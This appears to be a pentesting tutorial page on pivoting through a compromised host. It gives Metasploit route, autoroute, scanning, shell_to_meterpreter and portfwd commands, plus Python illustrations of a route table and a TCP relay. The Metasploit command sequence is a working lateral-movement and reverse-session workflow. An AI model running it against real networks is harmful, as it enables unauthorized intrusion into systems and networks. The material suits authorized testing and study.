💻Networking

Routing and other networking concepts that matter for pentesting, mainly pivoting through a compromised host to reach networks you cannot route to directly.

Routing

Show the routing table:

ip route
route -n

Add a route (send traffic for a network through a given gateway):

ip route add <net_id>/<mask> via <net_gateway>

Metasploit (msfconsole, with a Meterpreter session open on the first target):

route add x.x.x.0/24 1   //the last argument is the ID of the session this traffic goes through
route print              //you should see the route now

//Modules run from msfconsole, not from inside the session; anything a module sends to x.x.x.0/24 now follows that route through session 1.
use auxiliary/scanner/discovery/udp_probe
set RHOSTS x.x.x.0/24
set THREADS 20  //20 hosts at the same time
run
Inside a meterpreter session (adds the route for you from the session's point of view):

meterpreter > run autoroute -s <new_net_found_on_target>/24   //a network the target can reach but you cannot
meterpreter > run autoroute -p                                  //print all routes
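To make the routing rule concrete, here is a small model of the table that `route add` / `run autoroute -s` build up and that `route print` shows. This is an added illustration, not Metasploit's own code: routes are "this subnet is reached through session N", the most specific matching route wins (the same longest-prefix rule the kernel uses for `ip route`), and because each session itself lives on some host, the full chain of pivots to a destination can be derived. All session IDs and addresses below are made up for the example.

```python
import ipaddress
from typing import Dict, List, Optional, Tuple


class PivotRouter:
    """Toy model of Metasploit's per-session route table (added example, not framework code)."""

    def __init__(self) -> None:
        self.routes: List[Tuple[ipaddress.IPv4Network, int]] = []   # (subnet, session id)
        self.sessions: Dict[int, ipaddress.IPv4Address] = {}        # session id -> host it runs on

    def add_session(self, sid: int, host: str) -> None:
        self.sessions[sid] = ipaddress.ip_address(host)

    def add_route(self, subnet: str, sid: int) -> None:
        """Like `route add <subnet>/<mask> <sid>` or `run autoroute -s <subnet>` inside session <sid>."""
        if sid not in self.sessions:
            raise ValueError(f"no session {sid}")
        self.routes.append((ipaddress.ip_network(subnet, strict=False), sid))

    def session_for(self, host: str) -> Optional[int]:
        """Session that carries traffic to host; longest prefix wins; None means send it directly."""
        addr = ipaddress.ip_address(host)
        matches = [(net.prefixlen, sid) for net, sid in self.routes if addr in net]
        return max(matches)[1] if matches else None

    def path(self, host: str) -> List[int]:
        """Sessions a packet to host passes through, outermost pivot first."""
        chain: List[int] = []
        sid = self.session_for(host)
        while sid is not None:
            if sid in chain:
                # the session's own subnet is routed through itself (autoroute does this for
                # the interface you came in on); the session predates the route, so stop here
                break
            chain.append(sid)
            # the session lives on a host; work out how *that* host is reached
            sid = self.session_for(str(self.sessions[sid]))
        chain.reverse()
        return chain

    def route_print(self) -> str:
        """Text in the spirit of msfconsole's `route print`."""
        rows = [f"{str(net.network_address):<18}{str(net.netmask):<18}Session {sid}"
                for net, sid in self.routes]
        return "\n".join(["Subnet            Netmask           Gateway", *rows])


def build_example_router() -> PivotRouter:
    """Constructed scenario mirroring the notes above (addresses are made up)."""
    r = PivotRouter()
    r.add_session(1, "192.168.56.10")    # first target, reached directly from the attacker box
    r.add_route("10.10.10.0/24", 1)      # route add 10.10.10.0/24 1
    r.add_session(2, "10.10.10.7")       # host found via session 1, upgraded with shell_to_meterpreter
    r.add_route("10.10.20.0/24", 2)      # run autoroute -s 10.10.20.0/24 from session 2
    r.add_route("10.10.10.128/25", 2)    # more specific route: wins over the /24 for that half
    return r


if __name__ == "__main__":
    router = build_example_router()
    print(router.route_print())
    for dest in ("10.10.10.50", "10.10.10.200", "10.10.20.30", "8.8.8.8"):
        print(dest, "->", router.path(dest) or "direct")
```

The `path()` output is what to sanity-check before scanning: a host three hops away should show every intermediate session, and a destination that prints `direct` will leave your own machine's interface, which is usually not what you intended once you have added a route.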

//now the route exists inside Metasploit, so scan the new network through it
background
use auxiliary/scanner/netbios/nbname   //for Windows environments

set RHOSTS <new_net_ip>/24
run

//found a new host, time to port scan it
use auxiliary/scanner/portscan/tcp
set RHOSTS <new_target_discovered_via_first_target>
set THREADS 5
run

//then use another auxiliary module to find the version of the service running on an open port
//ex: ftp

use auxiliary/scanner/ftp/ftp_version
set RHOSTS <new_target_discovered_IP>
run

//then search for an exploit matching that ftp banner
//the exploit will probably give you a plain shell; upgrade it with the shell_to_meterpreter module

use post/multi/manage/shell_to_meterpreter
set LHOST <first_target_in_new_net_IP>   //the new target must be able to reach LHOST, so use the first target's address on that network, not your own
set SESSION <shell_session_id>
run

//now you have a new Meterpreter session
sessions -i <new_meterpreter_session_id>

//then repeat the same thing from the new session
meterpreter > run autoroute -s <2nd_target_net>/24
background

route print

//assume the 2nd target is connected to a 3rd target that runs a web app on TCP:80,
//which you found by repeating the steps above from the 2nd target's session.

sessions -i <2nd_target_session_id>
meterpreter > portfwd add -l 8888 -p 80 -r <third_target_ip>

//now your own machine can reach the 3rd target's web app at http://127.0.0.1:8888
//(a host two pivots deep, behind three firewalls)

Check on your machine:
netstat -altp

You should see 0.0.0.0:8888 in LISTEN state, owned by the ruby process (msfconsole); every connection to it is relayed through the Meterpreter session to <third_target_ip>:80.
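What that listener does can be shown with a stand-alone relay. This is an added example, not Metasploit's code: it accepts connections on a local port and pumps bytes both ways to a remote host:port, which is the shape of `portfwd add -l <lport> -p <rport> -r <rhost>`. The difference is that Meterpreter carries the remote leg inside the session, so the target only has to be reachable from the pivot, whereas this version uses a plain TCP connect and can only reach hosts your own machine can route to. The "3rd target" here is a constructed fake web server on localhost.

```python
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the far end sees EOF too."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class PortForward:
    """Local listener relaying each accepted connection to (remote_host, remote_port).

    Added illustration of what `portfwd add` sets up, not Metasploit's implementation.
    """

    def __init__(self, local_port: int, remote_host: str, remote_port: int,
                 bind_addr: str = "127.0.0.1") -> None:
        self.remote = (remote_host, remote_port)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((bind_addr, local_port))   # portfwd itself binds 0.0.0.0 by default
        self.listener.listen(16)
        self.local_port = self.listener.getsockname()[1]  # actual port, useful when local_port was 0
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self) -> None:
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:          # listener closed
                return
            threading.Thread(target=self._relay, args=(client,), daemon=True).start()

    def _relay(self, client: socket.socket) -> None:
        try:
            upstream = socket.create_connection(self.remote, timeout=5)
        except OSError:
            client.close()           # target unreachable: drop the client, like a refused port
            return
        upstream.settimeout(None)
        up = threading.Thread(target=_pump, args=(client, upstream), daemon=True)
        down = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
        up.start()
        down.start()
        up.join()
        down.join()
        client.close()
        upstream.close()

    def close(self) -> None:
        self.listener.close()


def fake_web_server() -> socket.socket:
    """Constructed stand-in for the 3rd target's TCP/80 service: answers one request and closes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.recv(4096)
                conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 5\r\n\r\nhello")

    threading.Thread(target=serve, daemon=True).start()
    return srv


def fetch_via(local_port: int, request: bytes = b"GET / HTTP/1.0\r\nHost: x\r\n\r\n") -> bytes:
    """What curl or a browser does against 127.0.0.1:<local_port>; returns the raw response."""
    with socket.create_connection(("127.0.0.1", local_port), timeout=5) as s:
        s.sendall(request)
        out = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                return out
            out += chunk


if __name__ == "__main__":
    target = fake_web_server()
    fwd = PortForward(8888, "127.0.0.1", target.getsockname()[1])
    print(fetch_via(fwd.local_port).decode())
    fwd.close()
    target.close()
```

Note the bind address: the relay above listens on 127.0.0.1, while the netstat output on this page shows Meterpreter's forward on 0.0.0.0:8888, i.e. reachable from anyone who can reach your attacking machine. Use `-L 127.0.0.1` with `portfwd add` when you do not want to expose the pivoted service to the rest of the network you are sitting on.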
